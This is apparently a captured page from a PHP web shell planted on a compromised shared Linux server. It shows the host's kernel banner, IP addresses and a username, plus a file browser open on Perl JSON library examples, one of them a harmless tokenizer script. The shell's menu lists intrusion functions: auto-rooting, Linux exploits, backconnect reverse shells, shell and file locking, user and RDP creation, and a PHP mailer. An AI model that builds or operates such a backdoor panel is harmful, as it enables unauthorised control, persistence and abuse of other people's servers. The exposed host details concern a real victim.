Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.20
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
libjson-parse-perl /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
array.pl
133
B
-rw-r--r--
assert.pl
231
B
-rw-r--r--
bad-utf8.pl
363
B
-rw-r--r--
bad-utf8.txt
376
B
-rw-r--r--
chr.pl
285
B
-rw-r--r--
collide.pl
223
B
-rw-r--r--
ebi.pl
229
B
-rw-r--r--
first-bit.pl
814
B
-rw-r--r--
hash.pl
132
B
-rw-r--r--
json-tiny-round-trip-demo.pl
1.16
KB
-rw-r--r--
kani.pl
313
B
-rw-r--r--
key-collision.pl
217
B
-rw-r--r--
long-number.pl
198
B
-rw-r--r--
sasori.pl
222
B
-rw-r--r--
synopsis.pl
186
B
-rw-r--r--
tokenize-synopsis.pl
629
B
-rwxr-xr-x
true-subs.pl
223
B
-rw-r--r--
unicode-details.pl
1.08
KB
-rw-r--r--
validjson
1.09
KB
-rwxr-xr-x
whitespace-synopsis.pl
410
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tokenize-synopsis.pl
#!/usr/bin/perl use warnings; use strict; use JSON::Tokenize ':all'; my $input = '{"tuttie":["fruity", true, 100]}'; my $token = tokenize_json ($input); print_tokens ($token, 0); sub print_tokens { my ($token, $depth) = @_; while ($token) { my $start = tokenize_start ($token); my $end = tokenize_end ($token); my $type = tokenize_type ($token); print " " x $depth; my $value = substr ($input, $start, $end - $start); print "'$value' has type '$type'.\n"; my $child = tokenize_child ($token); if ($child) { print_tokens ($child, $depth+1); } my $next = tokenize_next ($token); $token = $next; } }
Close